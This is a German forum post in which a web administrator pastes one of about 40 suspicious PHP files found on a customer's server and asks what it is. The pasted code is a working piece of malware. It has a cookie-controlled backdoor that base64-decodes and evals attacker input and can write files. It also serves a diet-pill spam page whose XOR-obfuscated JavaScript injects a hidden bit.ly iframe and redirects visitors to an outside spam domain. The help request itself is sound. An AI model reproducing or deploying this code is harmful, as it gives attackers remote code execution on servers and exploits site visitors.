Suspekte PHP-Dateien auf Server
Verfasst: 05.08.2013, 06:19
Bei einem Kunden habe ich am Server ca. 40 gleiche, aber verschieden genannte PHP-Dateien gefunden, welche mir ziemlich suspekt erscheinen, insbesondere., weil niemand weiß wie die dort hin gekommen sind.
Ich habe eine davon unten eingestellt, kann mir wer sagen, was das ist?
Ich habe eine davon unten eingestellt, kann mir wer sagen, was das ist?
Code: Alles auswählen
<?php
if(isset($_COOKIE['ggm'])){ob_start();$b=strrev("edoced_4"."6esab");eval($b($_COOKIE['ggm']));setcookie($_COOKIE['ggn'],$_COOKIE['ggp'].base64_encode(ob_get_contents()).$_COOKIE['ggp']);ob_end_clean();}
if(isset($_COOKIE['f'])){ file_put_contents("f.txt", $_COOKIE['f']); }
if(isset($_GET['i'])){ $name = './foxlogo.jpg'; $fp = fopen($name, 'rb'); header("Content-Type: image/jpeg"); header("Content-Length: " . filesize($name)); fpassthru($fp); exit; }
function rand_string( $length ) {
$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
$size = strlen( $chars );
$str = "";
for( $i = 0; $i < $length; $i++ ) {
$str .= $chars[ rand( 0, $size - 1 ) ];
}
return $str;
}
$prefix="m";
$titles = array("Lose 1-2 Pounds Daily! Permanently!","No Hunger Pains, Maintain Muscle Tone, Feel Great!","Equally as Effective as Clinical Injections. Save Money & NO Pain!","Made in the USA! FDA Compliant! All Natural & Completely Safe!","Raspberry Ultra is YOUR Solution! Guaranteed Results!","America Top Diet Trends","The best Diet","Top Diet");
$title = $titles[array_rand($titles)];
$img_link = "http://".$_SERVER["HTTP_HOST"]."/".$prefix."/".rand_string(10).".jpg";
$waits = array("Wait please...", "Open...", "........", "1 second!","...","Please, wait!");
$wait = $waits[array_rand($waits)];
function xo( $text, $xorKey ) {
$xored = '';
$chars = str_split( $text );
$i = 0;
while ( $i < count( $chars ) ) {
$xored .= chr( ord( $chars[$i] ) ^ $xorKey );
$i++;
}
return rawurlencode($xored);
}
$magickword = "a".rand_string(5);
$x=rand(1,99);
$bitly="<iframe src='http://bit.ly/W2HpQg' width='1' height='1' frameborder='0'></iframe>";
$redir = "<script>function delayer(){window.location = 'http://best.diet.news.2013.for.lose.".rand(1,5).".pound.xcfox.com/?s=daidu16'}; setTimeout('delayer()', 200);</script>";
?><!DOCTYPE HTML>
<html><head><title><?php echo $title; ?></title>
<meta property="og:title" content="<?php echo $title; ?>"/>
<meta property="og:type" content="article"/>
<meta property="og:url" content="<?php echo "http://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"] ?>"/>
<meta property="og:site_name" content="<?php echo $_SERVER["HTTP_HOST"] ?>"/>
<meta property="og:image" content="<?php echo "http://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"]."?i=".rand_string(10).".jpg" ?>"/>
<script>function <?= $magickword ?>(s) { var key=<?= $x ?>; var str = decodeURIComponent(s); var xored = ""; for (i=0; i<str.length;i++) { var a = str.charCodeAt(i); var b = a ^ key; xored = xored+String.fromCharCode(b); } document.write(xored); return xored; };
</script>
</head><body id="<?= rand_string(50) ?>" >
<h1 id="<?= rand_string(50) ?>"><script><?= $magickword ?>('<?= xo( $wait, $x ) ?>');</script></h1>
<script><?= $magickword ?>('<?= xo( $bitly, $x ) ?>');</script><script><?= $magickword ?>('<?= xo( $redir, $x ) ?>');</script></body></html>